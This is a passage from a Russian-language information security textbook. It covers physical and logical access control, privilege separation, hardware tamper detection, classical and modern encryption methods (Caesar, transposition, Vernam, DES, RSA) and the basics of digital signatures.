Традиционные средства контроля доступа в защищаемую зону: из-
готовление и выдача допущенным лицам специальных пропусков с раз-
мещенной на них фотографией личности владельца и сведений о нем.
Данные пропуска могут храниться у владельца или непосредственно в
пропускной кабине охраны. В последнем случае допущенное лицо назы-
вает фамилию и свой номер либо набирает его на специальной панели
кабины при проходе через турникет; пропускное удостоверение выпада-
ет из гнезда и поступает в руки работника охраны, который визуально
сверяет личность владельца с изображением на фотографии, названную
фамилию с фамилией на пропуске. Эффективность защиты данной си-
стемы выше первой. При этом исключаются: потеря пропуска, его пере-
хват и подделка. Кроме того, есть резерв в повышении эффективности
защиты с помощью увеличения количества проверяемых параметров.
102
Однако основная нагрузка по контролю при этом ложится на человека, а
он, как известно, может ошибаться.
В зарубежной литературе имеются сообщения о применении био-
метрических методов аутентификации человека, когда используются в
качестве идентификаторов отпечатки пальцев, ладони, голоса, личной
подписи. Однако перечисленные методы пока не получили широкого
распространения.
Совершенствование контрольно-пропускной системы в настоящее
время ведется также в направлении совершенствования конструкции
пропуска-удостоверения личности путем записи кодовых значений па-
ролей. Подробнее вопросы идентификации и проверки подлинности
личности рассмотрены ниже.
Физическая преграда защитного контура, размещаемая по перимет-
ру охраняемой зоны, снабжается охранной сигнализацией.
В настоящее время ряд предприятий выпускает электронные систе-
мы для защиты военных, государственных и частных объектов от про-
никновения в них посторонних лиц. Гарантировать эффективность си-
стемы охранной сигнализации можно только в том случае, если обеспе-
чены надежность всех ее составных элементов и их согласованное
функционирование. При этом имеют значение тип датчика, способ опо-
вещения или контроля, помехоустойчивость, а также реакция на сигнал
тревоги. Местная звуковая или световая сигнализация может оказаться
недостаточной, поэтому местные устройства охраны целесообразно под-
ключить к специализированным средствам централизованного управле-
ния, которые при получении сигнала тревоги высылают специальную
группу охраны.
Следить за состоянием датчиков может автоматическая система,
расположенная в центре управления, или сотрудник охраны, который
находится на объекте и при световом или звуковом сигнале принимает
соответствующие меры. В первом случае местные охранные устройства
подключаются к центру через телефонные линии, а специализированное
цифровое устройство осуществляет периодический опрос состояния
датчиков, автоматически набирая номер приемоответчика, расположен-
ного на охраняемом объекте. При поступлении в центр сигнала тревоги
автоматическая система включает сигнал оповещения.
Датчики сигналов устанавливаются на различного рода ограждени-
ях, внутри помещений, непосредственно на сейфах и т. д.
103
При разработке комплексной системы охраны конкретного объекта
учитывают его специфику: внутреннюю планировку здания, окон, вход-
ной двери, размещение наиболее важных технических средств.
Все эти факторы влияют на выбор типа датчиков, их расположение
и определяют ряд других особенностей данной системы. По принципу
действия системы тревожной сигнализации можно классифицировать
следующим образом [1]:
 традиционные (обычные), основанные на использовании цепей
сигнализации и индикации в комплексе с различными контактами
(датчиками);
 ультразвуковые;
 прерывания луча;
 телевизионные;
 радиолокационные;
 микроволновые;
 прочие.
2.9.2. Разделение привилегий на доступ
Разделение привилегий на доступ к информации заключается в том,

что из числа допущенных к ней должностных лиц выделяется группа,
которой предоставляется доступ только при одновременном предъявле-
нии полномочий всех членов группы.
Задача указанного метода - существенно затруднить преднамерен-
ный перехват информации нарушителем. Примером такого доступа мо-
жет быть сейф с несколькими ключами, замок которого открывается
только при наличии всех ключей. Аналогично в АС может быть преду-
смотрен механизм разделения привилегий при доступе к особо важным
данным с помощью кодов паролей.
Данный метод несколько усложняет процедуру, но обладает высо-
кой эффективностью защиты. На его принципах можно организовать до-
ступ к данным с санкции вышестоящего лица по запросу или без него.
Сочетание двойного криптографического преобразования инфор-
мации и метода разделения привилегий позволяет обеспечить высоко-
эффективную защиту информации от преднамеренного НСД.
Кроме того, при наличии дефицита в средствах, а также в целях по-
стоянного контроля доступа к ценной информации со стороны админи-
страции потребителя АС в некоторых случаях возможен вариант ис-
пользования права на доступ к информации нижестоящего руководителя
только при наличии его идентификатора и идентификатора его замести-
104
теля или представителя службы безопасности информации. При этом
информация выдается на дисплей только руководителя, а на дисплей
подчиненного - только информация о факте ее вызова.
2.9.3. Контроль доступа к аппаратуре
В целях контроля доступа к внутреннему монтажу, линиям связи и

технологическим органам управления используется аппаратура кон-
троля вскрытия аппаратуры. Это означает, что внутренний монтаж аппа-
ратуры и технологические органы и пульты управления закрыты крыш-
ками, дверцами или кожухами, на которые установлены датчики. Датчи-
ки срабатывают при вскрытии аппаратуры и выдают электрические сиг-
налы, которые по цепям сбора поступают на централизованное устрой-
ство контроля. Установка такой системы имеет смысл при наиболее
полном перекрытии всех технологических подходов к аппаратуре,
включая средства загрузки программного обеспечения, пульт управле-
ния ЭВМ и внешние кабельные соединители технических средств, вхо-
дящих в состав вычислительной системы. В идеальном случае для си-
стем с повышенными требованиями к эффективности защиты информа-
ции целесообразно закрывать крышками под механический замок с дат-
чиком или ставить под контроль включение также штатных средств вхо-
да в систему - терминалов пользователей.
Контроль вскрытия аппаратуры необходим не только в интересах
защиты информации от НСД, но и для соблюдения технологической
дисциплины в целях обеспечения нормального функционирования вы-
числительной системы, потому что часто при эксплуатации параллельно
решению основных задач производится ремонт или профилактика аппа-
ратуры, и может оказаться, что случайно забыли подключить кабель или
с пульта ЭВМ изменили программу обработки информации. С позиций
защиты информации от несанкционированного доступа контроль вскры-
тия аппаратуры защищает от следующих действий:
 изменения и разрушения принципиальной схемы вычислительной
системы и аппаратуры;
 подключения постороннего устройства;
 изменения алгоритма работы вычислительной системы путем ис-
пользования технологических пультов и органов управления;
 загрузки посторонних программ и внесения программных "виру-
сов" в систему;
 использования терминалов посторонними лицами и т. д.
105
Основная задача систем контроля вскрытия аппаратуры - перекры-
тие на период эксплуатации всех нештатных и технологических подхо-
дов к аппаратуре. Если последние потребуются в процессе эксплуатации
системы, выводимая на ремонт или профилактику аппаратура перед
началом работ отключается от рабочего контура обмена информацией,
подлежащей защите, и вводится в рабочий контур под наблюдением и
контролем лиц, ответственных за безопасность информации.
Доступ к штатным входам в систему - терминалам контролируется
с помощью контроля выдачи механических ключей пользователям, а до-
ступ к информации - с помощью системы опознания и разграничения
доступа, включающей применение кодов паролей, соответствующие
функциональные задачи программного обеспечения и специального
терминала службы безопасности информации.
Указанный терминал и устройство контроля вскрытия аппаратуры
входят в состав рабочего места службы безопасности информации, с ко-
торого осуществляются централизованный контроль доступа к аппара-
туре и информации и управление ее защитой на данной вычислительной
системе.
2.9.4. Разграничение и контроль доступа к информации
Разграничение доступа в вычислительной системе заключается в

разделении информации, циркулирующей в ней, на части и организации
доступа к ней должностных лиц в соответствии с их функциональными
обязанностями и полномочиями.
Задача разграничения доступа: сокращение количества должностных
лиц, не имеющих к ней отношения при выполнении своих функций, т. е.
защита информации от нарушителя среди допущенного к ней персонала.
При этом деление информации может производиться по степени
важности, секретности, по функциональному назначению, по докумен-
там и т. д.
Принимая во внимание, что доступ осуществляется с различных
технических средств, начинать разграничение можно путем разграниче-
ния доступа к техническим средствам, разместив их в отдельных поме-
щениях. Все подготовительные функции технического обслуживания
аппаратуры, ее ремонта, профилактики, перезагрузки программного
обеспечения и т. д. должны быть технически и организационно отделе-
ны от основных задач системы. АС и организация его обслуживания
должны быть построены следующим образом:
106
 техническое обслуживание АС в процессе эксплуатации должно
выполняться отдельным персоналом без доступа к информации,
подлежащей защите;
 перезагрузка программного обеспечения и всякие его изменения
должны производиться специально выделенным для этой цели
проверенным специалистом;
 функции обеспечения безопасности информации должны выпол-
няться специальным подразделением в организации - владельце
АС, вычислительной сети или АС;
 организация доступа пользователей к памяти АС обеспечивала
возможность разграничения доступа к информации, хранящейся в
ней, с достаточной степенью детализации и в соответствии с за-
данными уровнями полномочий пользователей;
 регистрация и документирование технологической и оперативной
информации должны быть разделены.
Разграничение доступа пользователей - потребителей АС может
осуществляться также по следующим параметрам:
 по виду, характеру, назначению, степени важности и секретности
информации;
 по способам ее обработки: считать, записать, внести изменения,
выполнить команду;
 по условному номеру терминала;
 по времени обработки и др.
Принципиальная возможность разграничения по указанным пара-
метрам должна быть обеспечена проектом АС. А конкретное разграни-
чение при эксплуатации АС устанавливается потребителем и вводится в
систему его подразделением, отвечающим за безопасность информации.
В указанных целях при проектировании базового вычислительного
комплекса для построения АС производятся:
- разработка операционной системы с возможностью реализации
разграничения доступа к информации, хранящейся в памяти ВК;
- изоляция областей доступа;
- разделение базы данных на группы;
- процедуры контроля перечисленных функций.
При проектировании АС и информационной системы АС (сети) на
их базе производятся:
- разработка и реализация функциональных задач по разграничению
и контролю доступа к аппаратуре и информации как в рамках дан-
ного АС, так и АС (сети) в целом;
107
- разработка аппаратных средств идентификации и аутентификации
пользователя;
- разработка программных средств контроля и управления разгра-
ничением доступа;
- разработка отдельной эксплуатационной документации на сред-
ства идентификации, аутентификации, разграничения и контроля
доступа.
В качестве идентификаторов личности для реализации разграниче-
ния широко распространено применение кодов паролей, которые хра-
нятся в памяти пользователя и АС. В помощь пользователю в системах с
повышенными требованиями большие значения кодов паролей записы-
ваются на специальные носители - электронные ключи или карточки.
108
3. КРИПТОГРАФИЧЕСКИЕ МЕТОДЫ И СРЕДСТВА
ЗАЩИТЫ ИНФОРМАЦИИ
3.1. Основные понятия криптографического преобразо-
вания информации
С появлением письменности в человеческом обществе появилась
потребность в обмене письмами и сообщениями, что, в свою очередь,
вызвало необходимость сокрытия содержимого письменных сообщений
от посторонних. Среди методов сокрытия содержимого письменных со-
общений можно выделить три группы.
К первой группе относятся методы маскировки, которые осуществ-
ляют сокрытие самого факта наличия сообщения, например, с помощью
симпатических чернил.
Вторую группу составляют различные методы тайнописи или
криптографии (от греческих слов kryptos - тайный и grapho - пишу). Эти
методы применяются для изменения сообщения с целью сделать текст
непонятным для непосвященных.
С развитием науки и техники стали применяться методы третьей
группы, которые ориентированы на создание специальных технических
устройств, например, инвертирования речи.
Далее будем рассматривать только методы второй группы, а именно
- методы криптографии.
Метод криптографии можно определить как некоторое множество
отображений одного пространства (пространства возможных сообще-
ний) в другое пространство (пространство возможных криптограмм).
Каждое конкретное отображение из этого множества соответствует
шифрованию при помощи конкретного ключа.
Дадим определения этих понятий.
Сообщение, текст которого необходимо сделать непонятным для
посторонних, будем называть исходным сообщением или открытым
текстом.
Шифрование данных - процесс преобразования открытых данных в
зашифрованные данные (шифртекст, криптограмму) при помощи шиф-
ра. Иногда этот процесс называют зашифрованием данных.
Шифр - совокупность обратимых преобразований множества воз-
можных открытых данных во множество возможных шифртекстов, осу-
ществляемых по определенным правилам с применением ключей.
109
Ключ - конкретное секретное состояние некоторого параметра (па-
раметров), обеспечивающее выбор одного преобразования из совокуп-
ности возможных для используемого метода шифрования.
Различные методы шифрования применялись еще в древности. До
наших дней дошли зашифрованные записи, высеченные на гробницах в
Египте. До наших дней также дошли арабские шифры IX века, материалы
венецианской школы криптографии эпохи Возрождения и многое другое.
Практически одновременно с криптографией стал развиваться и
криптоанализ - наука о раскрытии шифров (ключей) по шифртексту.
Вторая мировая война дала новый толчок развитию криптографии и
криптоанализа, что было вызвано применением технических средств
связи и боевого управления. Для разработки новых шифров и работы в
качестве криптоаналитиков привлекались ведущие ученые. В годы Вто-
рой мировой войны был разработан ряд механических устройств для
шифрования сообщений.
В 1949 году была опубликована статья Клода Шеннона "Теория
связи в секретных системах", которая определила научную базу крипто-
графии и криптоанализа. С этого времени стали говорить о новой науке
КРИПТОЛОГИИ (от греческого kryptos - тайный и logos - сообщение), -
науке о преобразовании информации для обеспечения ее секретности.
Как известно, до недавнего времени криптографические средства ис-
пользовались преимущественно для сохранения государственной тайны,
поэтому эти средства разрабатывались специальными органами. При этом
использовались криптосистемы очень высокой стойкости, что, естествен-
но, сопряжено было с большими затратами. В настоящее время с появле-
нием АС сфера защиты информации быстро расширяется. Поэтому в по-
следние годы интенсивно разрабатываются новые способы и средства
криптографического преобразования данных, которые находят примене-
ние для сохранения различных видов секретов и в различных условиях.
Криптографические методы защиты информации в автоматизиро-
ванных системах могут применяться для защиты информации, обраба-
тываемой в ЭВМ и для закрытия информации, передаваемой по линиям
связи. Поэтому криптографические методы могут использоваться как
внутри отдельных устройств или звеньев системы, так и на различных
участках линий связи.
Известны различные подходы к классификации методов крипто-
графического преобразования информации. По виду воздействия на ис-
ходную информацию методы криптографического преобразования ин-
формации могут быть разделены на четыре группы (рис.17.)
110
Процесс шифрования заключается в проведении обратимых мате-
матических, логических, комбинаторных и других преобразований ис-
ходной информации, в результате которых зашифрованная информация
представляет собой хаотический набор букв, цифр, других символов и
двоичных кодов.
Рис. 17. Классификация методов криптографического преобра-

зования информации
Для шифрования информации используются алгоритм преобразо-
вания и ключ. Как правило, алгоритм для определенного метода шифро-
вания является неизменным. Исходными данными для алгоритма шиф-
рования служат информация, подлежащая зашифрованию, и ключ шиф-
рования. Ключ содержит управляющую информацию, которая определя-
ет выбор преобразования на определенных шагах алгоритма и величины
операндов, используемые при реализации алгоритма шифрования.
В отличие от других методов криптографического преобразования
информации, методы стеганографии позволяют скрыть не только
смысл хранящейся или передаваемой информации, но и сам факт хране-
ния или передачи закрытой информации. В компьютерных сетях прак-
тическое использование стеганографии только начинается, но проведен-
ные исследования показывают ее перспективность. В основе всех мето-
дов стеганографии лежит маскирование закрытой информации среди от-
крытых файлов. Обработка мультимедийных файлов в АС открыла
практически неограниченные возможности перед стеганографией.
Существует несколько методов скрытой передачи информации.
Графическая и звуковая информация представляются в числовом виде.
Так в графических объектах наименьший элемент изображения может
кодироваться одним байтом. В младшие разряды определенных байтов
111
изображения в соответствии с алгоритмом криптографического преобра-
зования помещаются биты скрытого файла. Если правильно подобрать
алгоритм преобразования и изображение, на фоне которого помещается
скрытый файл, то человеческому глазу практически невозможно отли-
чить полученное изображение от исходного. Очень сложно выявить
скрытую информацию и с помощью специальных программ. Наилуч-
шим образом для внедрения скрытой информации подходят изображе-
ния местности, снимки со спутников, самолетов и т. п. С помощью
средств стеганографии могут маскироваться текст, изображение, речь,
цифровая подпись, зашифрованное сообщение. Комплексное использо-
вание стеганографии и шифрования многократно повышает сложность
решения задачи обнаружения и раскрытия информации.
Содержанием процесса кодирования информации является замена
смысловых конструкций исходной информации (слов, предложений) ко-
дами. В качестве кодов могут использоваться сочетания букв, цифр,
букв и цифр. При кодировании и обратном преобразовании используют-
ся специальные таблицы или словари. Кодирование информации целе-
сообразно применять в системах с ограниченным набором смысловых
конструкций. Такой вид криптографического преобразования применим,
например, в командных линиях АС. Недостатками кодирования конфи-
денциальной информации является необходимость хранения и распро-
странения кодировочных таблиц, которые необходимо часто менять,
чтобы избежать раскрытия кодов статистическими методами обработки
перехваченных сообщений.
Сжатие информации может быть отнесено к методам криптографи-
ческого преобразования информации с определенными оговорками. Це-
лью сжатия является сокращение объема информации. В то же время,
сжатая информация не может быть прочитана или использована без об-
ратного преобразования. Учитывая доступность средств сжатия и обрат-
ного преобразования, эти методы нельзя рассматривать как надежные
средства криптографического преобразования информации. Даже если
держать в секрете алгоритмы, то они могут быть сравнительно легко
раскрыты статистическими методами обработки. Поэтому сжатые фай-
лы конфиденциальной информации подвергаются последующему шиф-
рованию. Для сокращения времени целесообразно совмещать процесс
сжатия и шифрования информации.
В настоящее время разработано большое количество различных ме-
тодов шифрования, созданы теоретические и практические основы их
применения. Подавляющее число этих методов может быть успешно ис-
112
пользовано и для закрытия информации в АС. Наличие в составе таких
систем быстродействующих процессоров и запоминающих устройств
большого объема значительно расширяет возможности криптографиче-
ского закрытия.
Однако для того, чтобы криптографическое преобразование обес-
печивало эффективную защиту информации в АС, оно должно удовле-
творять ряду требований. Эти требования были выработаны в процессе
практического применения криптографии, часть их основана на техни-
ко-экономических соображениях. В сжатом виде их можно сформулиро-
вать следующим образом:
 сложность и стойкость криптографического закрытия должны вы-
бираться в зависимости от объема и степени секретности данных;
 надежность закрытия должна быть такой, чтобы секретность не
нарушалась даже в том случае, когда злоумышленнику становится
известен метод закрытия;
 метод закрытия, набор используемых ключей и механизм их рас-
пределения не должны быть слишком сложными, так как в про-
тивном случае потребуются большие затраты вычислительных и
временных ресурсов;
 выполнение процедур прямого и обратного преобразований должно
быть формальным. Эти процедуры не должны зависеть от длины
сообщений;
 ошибки, возникающие в процессе выполнения преобразования, не
должны распространяться по системе;
 вносимая процедурами защиты избыточность в массивы хранимых
и обрабатываемых данных должна быть минимальной.
Для преобразования (шифрования) информации обычно использу-
ется некоторый алгоритм или устройство, реализующее заданный алго-
ритм, которые могут быть известны широкому кругу лиц. Управление
процессом шифрования осуществляется с помощью периодически ме-
няющегося кода ключа, обеспечивающего каждый раз оригинальное
представление информации при использовании одного и того же алго-
ритма или устройства. Знание ключа позволяет просто и надежно рас-
шифровать текст. Однако без знания ключа эта процедура может быть
практически невыполнима даже при известном алгоритме шифрования.
Даже простое преобразование информации является весьма эффек-
тивным средством, дающим возможность скрыть ее смысл от большин-
ства неквалифицированных нарушителей.
Структурная схема шифрования информации представлена на рис. 18.
113
Рис. 18. Шифрование информации
Для построения средств защиты от НСД необходимо иметь пред-
ставление о методах криптографии. Их классификация приведена на рис.
19, любой ключ из множества возможных должен обеспечивать надеж-
ную защиту информации, алгоритм должен допускать как программную,
так и аппаратную реализацию[4].
Рис. 19. Классификация методов криптографии

Сам процесс криптографического закрытия данных может осу-
ществляться как программно, так и аппаратно, однако аппаратная реали-
114
зация обладает рядом преимуществ, главным из которых является высо-
кая производительность.
Сформулирована следующая система требований к алгоритму
шифрования:
 зашифрованный текст должен поддаваться чтению только при
наличии ключа шифрования,
 число операций для определения использованного ключа шифро-
вания по фрагменту шифрованного текста и соответствующему
ему открытого текста, должно быть не меньше общего числа воз-
можных ключей,
 знание алгоритма шифрования не должно влиять на надежность
защиты,
 незначительные изменения ключа шифрования должны приводить
к существенному изменению вида зашифрованного текста,
 незначительные изменения шифруемого текста должны приводить
к существенному изменению вида зашифрованного текста даже
при использовании одного и того же ключа,
 длина шифрованного текста должна быть равна длине исходного
текста, любой ключ из множества возможных должен обеспечи-
вать надежную защиту информации,
 алгоритм должен допускать как программную, так и аппаратную
реализацию[20].
3.1.1. Основные методы шифрования
Чаще всего в криптографии используются две простые формы

шифрования - подстановка и перестановка.
В основе метода подстановки лежит принцип кодировочной табли-
цы. Простейшие методы подстановки применялись еще в Древнем Риме
- Юлий Цезарь переписывался со своими корреспондентами, заменяя
каждую букву текста на букву, стоящую в алфавите на три позиции по-
зади. Например, если мы таким способом зашифруем слова
ЗАЩИТАИНФОРМАЦИИ
то получим
КГЬЛХГЛРЧСУПГЩЛЛ,
то есть, вроде бы, бессмысленный набор символов, разобрать кото-
рый сложно. К сожалению, при достаточно длинных текстах такого рода
шифры очень просто "раскалываются" методом частотного анализа, ис-
пользующего данные о частоте встречаемости букв в определенном язы-
115
ке. Есть и другие методы анализа текстов, закрытых таким способом -
вспомним хотя бы рассказ Конан Дойля "Пляшущие человечки".
При использовании метода перестановок текст разбивается на бло-
ки фиксированной длины, внутри каждого из которых символы меняют-
ся местами по определенному правилу. Ключом при этом является по-
следовательность цифр, указывающая способ перестановки символов.
Например, разобьем слова
ЗАЩИТАДАННЫХОТУТЕЧКИ
на 4 группы по 5 символов
ЗАЩИТ АДАНН ЫХОТУ ТЕЧКИ
и переставим буквы в каждой группе в соответствии с ключом 1-3-
5-2-4. Получим (после удаления пробелов) текст
ЗЩТАИААНДНЫОУХТТЧИЕК.
На практике возможно совместное использование подстановок и
перестановок, что несколько повышает криптостойкость шифра.
Методы подстановки получили новый импульс после того, как в
1917 г. Г.С.Вернам опубликовал замечательную систему побитового
шифрования открытого текста, представленного в телеграфном коде Бо-
до. Каждый бит при этом преобразуется с помощью нового бита ключа
по правилу "сложение по модулю 2" или "исключающее или" (XOR):
0 XOR 0 = 0; 0 XOR 1 = 1; 1 XOR 0 = 1; 1 XOR 1 = 0.
Если защищаемая нами информация представлена в виде последо-
вательности бит (как, например, при записи текста в памяти ЭВМ в
стандартной кодировке ASCII), то, "накладывая" на эту информацию
гамму шифра, мы легко получим зашифрованный текст. Расшифровка
при этом осуществляется повторным наложением той же гаммы, что
весьма удобно. Если ключ (гамму) использовать только один раз и при
этом длина гаммы соответствует длине шифруемого текста, то мы полу-
чаем, как показал К.Шеннон, действительно не раскрываемый шифр.
Иногда применительно к такой схеме употребляется термин "линейное
шифрование".
Чтобы получить линейные последовательности элементов гаммы,
длина которых превышает размер шифруемых данных, используют дат-
чики псевдослучайных числе (ПСЧ). На основе математической теории
групп было разработано несколько типов таких датчиков.
В настоящее время наиболее эффективными являются так называе-
мые конгруэнтные генераторы ПСЧ, в которых каждое последующее
ПСЧ получается из предыдущего с помощью специального преобразо-
116
вания. Типичным примером является линейный конгруэнтный датчик,
который вырабатывает последовательности псевдослучайных чисел T(i),
описываемые соотношением:
T(i+1) = ( A * T(i) + C ) mod M, (1)
где A и С - константы, Т(0) -исходная величина, выбранная в каче-
стве порождающего числа.
Такой датчик генерирует ПСЧ с определенным периодом повторе-
ния, зависящим от выбранных значений А и С. Значение М обычно вы-
бирается равным 2^b, где b - длина слова ЭВМ, на которой реализован
датчик, в битах. Датчик имеет максимальный период М до того, как ге-
нерируемая последовательность начнет повторяться. Как показал
Д.Кнут, линейный конгруэнтный датчик ПСЧ имеет максимальную дли-
ну М тогда и только тогда, когда С - нечетное и A mod 4 = 1. Это означа-
ет, что для 16-битовой ЭВМ период датчика будет равен 2 в 16 степени,
т.е. 65536. Если сравнить это число с количеством символов на стан-
дартной книжной странице, то получим, что таким датчиком можно "га-
рантировано" закрыть (до смены ключа) примерно 24 страницы текста.
После этого можно менять значения А, С, Т(0) и повторять все сначала.
Следует, однако, отметить одну неприятную особенность, связан-
ную с зашифрованием документов, содержащих общеизвестную стан-
дартную информацию, например, наименования реквизитов, гриф сек-
ретности, адрес и т.п. Предполагая, что в начале дешифруемого текста
находится известная стандартная информация, можно "вскрыть" исполь-
зуемый датчик. Это становится возможным потому, что алгоритм шиф-
рования не зависит ни от длины шифруемого файла, ни от его содержа-
ния. Для повышения криптостойкости таких шифров предложен целый
ряд методов, например - метод гаммирования с обратной связью, кото-
рый заключается в том, что для получения сегмента гаммы в качестве
порождающего числа используется контрольная сумма определенного
участка шифруемых данных.
Кроме гаммирования используются и другие системы шифрования.
3.1.2. Системы шифрования с закрытым ключом
Различают два основных метода шифрования: симметричный и

асимметричный. В первом из них один и тот же ключ (хранящийся в
секрете) используется и для зашифрования, и для расшифрования дан-
ных. Разработаны весьма эффективные (быстрые и надежные) методы
симметричного шифрования. Наиболее известным стандартом на сим-
117
метричное шифрование с закрытым ключом является стандарт для обра-
ботки информации в государственных учреждениях США DES (Data
Encryption Standard). Алгоритм DES использует ключ длиной 56 бит, что
требует от злоумышленника перебора 72 квадриллионов возможных
ключевых комбинаций. Более криптостойкая (но втрое менее быстро-
действующая) версия алгоритма DES — Triple DES позволяет задать
ключ длиной 112 бит.
Другим популярным алгоритмом шифрования является IDEA
(International Data Encryption Algorithm), отличающийся применением
ключа длиной 128 бит. Он считается более стойким, чем DES.
Отечественный подобный стандарт шифрования данных — ГОСТ
28147-89 “Системы обработки информации. Защита криптографическая.
Алгоритм криптографического преобразования” определяет алгоритм
симметричного шифрования с ключом длиной до 256 бит.
Рис. 20 иллюстрирует использование симметричного шифрования.
Для определенности мы будем вести речь о защите сообщений, хотя со-
бытия могут развиваться не только в пространстве, но и во времени, ко-
гда зашифровываются и расшифровываются никуда не перемещающие-
ся файлы.
К достоинствам симметричных методов относят высокое быстро-
действие и простоту.
Основным недостатком симметричного шифрования является то,
что секретный ключ должен быть известен и отправителю, и получате-
лю. С одной стороны, это создает новую проблему распространения
ключей. По существу, в открытых сетях должен быть предусмотрен фи-
зически защищенный канал передачи ключей. С другой стороны, полу-
чатель на основании наличия зашифрованного и расшифрованного со-
общения не может доказать, что он получил это сообщение от конкрет-
ного отправителя, поскольку такое же сообщение он мог сгенерировать
самостоятельно. Названный недостаток послужил причиной разработки
методов шифрования с открытым ключом — асимметричных методов.
118
Рис. 20. Использование симметричного метода шифрования
3.1.3. Системы шифрования с открытым ключом
В настоящее время считается, что наиболее перспективными явля-

ются системы криптографической защиты с открытым ключом.
В асимметричных методах используются два ключа. (см. рис. 21).
Один ключ является закрытым и известным только получателю. Его ис-
пользуют для расшифрования. Второй из ключей является открытым,
т.е. он может быть общедоступным по сети и опубликован вместе с ад-
ресом пользователя. Его используют для выполнения шифрования. По-
нятно, что ключ расшифрования нельзя определить из ключа зашифро-
вания. Самым популярным из асимметричных является метод RSA (Рай-
вест, Шамир, Адлеман), основанный на операциях с большими (скажем,
100-значными) простыми числами и их произведениями.
119
Рис. 21. Ассиметричные системы шифрования
Формально асимметричный метод можно описать следующим об-
разом. Обозначим результат шифрования текста T с помощью открытого
ключа — E(T), а результат расшифровки текста с помощью закрытого
ключа — D(T). Тогда асимметричный метод должен отвечать следую-
щим трем требованиям:
D(E(T)) = T; (2)
D практически невозможно определить по E;
Е нельзя взломать.
Преимущество указанного метода состоит в уменьшении количе-
ства ключей, с которыми приходится оперировать. Однако данный алго-
ритм имеет существенный недостаток — требует значительной вычис-
лительной мощности.
Проиллюстрируем использование асимметричного шифрования
(см. рис. 22).
Существенным недостатком асимметричных методов шифрования
является их низкое быстродействие, поэтому данные методы приходится
сочетать с симметричными (асимметричные методы на 3 – 4 порядка
медленнее). Так, для решения задачи эффективного шифрования с пере-
дачей секретного ключа, использованного отправителем, сообщение
сначала симметрично зашифровывают случайным ключом, затем этот
ключ зашифровывают открытым асимметричным ключом получателя,
после чего сообщение и ключ отправляются по сети.
120
Как отмечалось, основным недостатком асимметричных алгорит-
мов является их низкое быстродействие: данные алгоритмы в несколько
тысяч раз медленнее симметричных алгоритмов! Поэтому для исключе-
ния данного недостатка используют технологии сочетания симметрич-
ных и асимметричных методов шифрования. В частности, текст шифру-
ется быстродействующим симметричным алгоритмом, а секретный
(случайный) ключ, сопровождающий текст, — асимметричным алго-
ритмом.
Рис. 22. Использование асимметричного метода шифрования.

Важным преимуществом асимметричных методов является воз-
можность идентификации отправителя путем использования его элек-
тронной подписи. Идея технологии электронной подписи состоит в сле-
дующем. Отправитель передает два экземпляра одного сообщения: от-
крытое и расшифрованное его закрытым ключом (т.е. обратно шифро-
ванное). Получатель шифрует с помощью открытого ключа отправителя
расшифрованный экземпляр. Если он совпадет с открытым вариантом,
то личность и подпись отправителя считается установленной.
В заключении отметим, что криптографические методы использу-
ются также для контроля целостности информации и программ. Для это-
го применяется шифрованная контрольная сумма исходного текста
(имитоприставка), вычисленная с применением секретного ключа. В от-
личии от традиционной контрольной суммы (используемой для защиты
от программно-аппаратных сбоев и ошибок), имитоприставка обеспечи-
вает практически абсолютную защиту как от непреднамеренной, так и
преднамеренной модификации данных или программы.
121
3.2. Архитектура алгоритмов ЭЦП
Поскольку подпись под важным документом может иметь далеко
идущие последствия, перед подписыванием необходимо предусмотреть
определенные меры предосторожности. В случае программной реализа-
ции, как правило, секретный ключ подписывающего хранится на его
личной дискете, защищенной от копирования. Однако этого бывает не-
достаточно, ведь дискету могут похитить или просто потерять. Следова-
тельно, необходима защита от несанкционированного доступа к секрет-
ной информации (ключу). Естественным решением этой проблемы явля-
ется парольная защита. Паролем могут закрываться не только функции
(опции) постановки ЭЦП и генерации ключей, но и функций, изменяю-
щие содержимое каталога открытых ключей абонентов сети, и др.
Необходимо проверить (в случае программной реализации, и осо-
бенно это важно для программной реализации на ПЭВМ), чтобы в си-
стеме не было "криптовирусов", которые могут нанести существенный
вред. Например, в момент подписывания криптовирусы могут перехва-
тить секретные ключи (и скопировать их в нужное место). Кроме то го,
при проверке подписи они могут заставить систему "сказать", что под-
пись верна, хотя она на самом деле неверна. Можно представить себе
криптовирус, который, попав в систему лишь один-единственный раз в
момент генерации ключей, "поможет" системе сгенерировать слабые
ключи. Например, если ключи генерируются на основе датчика случай-
ных чисел, который использует встроенный таймер, вирус может изме-
нить показания таймера, а потом восстановить "статус-кво". Впослед-
ствии эти ключи могут быть легко вскрыты злоумышленниками. Далее
этот вирус уже не нужен, он сделал свое дело. Против таких криптови-
русов имеется только одна защита – загрузка с чистой системной диске-
ты и использование чистого, "родного" программного продукта.
3.2.1. Постановка и проверка подписи
Чтобы поставить ЭЦП под конкретным документом, необходимо

проделать довольно большой объем вычислительной работы. Эти вы-
числения разбиваются на два этапа: генерация ключей и подписание до-
кумента.
Генерация ключей. На этом этапе для каждого абонента генериру-
ется пара ключей: секретный и открытый. Секретный ключ хранится
абонентом в тайне. Он используется для формирования подписи. От
крытый ключ связан с секретным с помощью особого математического
122
соотношения. Открытый ключ известен всем другим пользователям сети
и предназначен для проверки подписи. Его следует рассматривать как
необходимый инструмент для проверки, позволяющий определить авто-
ра подписи и достоверность электронного документа, но не позволяю-
щий вычислить секретный ключ.
Возможны два варианта проведения этого этапа. Естественным
представляется вариант, когда генерацию ключей абонент может осуще-
ствить самостоятельно. Не исключено, однако, что в определенных си-
туациях эту функцию целесообразно передать центру, который будет
вырабатывать пару секретный-открытый ключи для каждого абонента и
заниматься их распространением. Второй вариант имеет ряд преиму-
ществ административного характера, однако обладает принципиальным
недостатком - у абонента нет гарантии, что его личный секретный ключ
является уникальным. Другими словами, можно сказать, что здесь все
абоненты находятся "под колпаком" центра и центр может подделать
любую подпись .
Подписание документа. Прежде всего, документ "сжимают" до не-
скольких десятков или сотен байт с помощью так называемой хеш-
функции. Здесь термин "сжатие" вовсе не аналогичен термину "архива-
ция", значение хеш-функции лишь только сложным образом зависит от
документа, но не позволяет восстановить сам документ. Эта хеш-
функция должна удовлетворять ряду условий:
быть чувствительна к всевозможным изменениям в тексте, таким,
как вставки, выбросы, перестановки и т.п.;
обладать свойством необратимости, т.е. задача подбора документа,
который обладал бы требуемым значением хеш-функции, вычислитель-
но неразрешима.
Вероятность того, что значения хеш-функций двух различных до-
кументов (вне зависимости от их длин) совпадут, должна быть ничтожно
мала.
Ниже будет рассмотрено, какие нападения становятся возможными,
если пренебречь хотя бы одним из перечисленных выше условий.
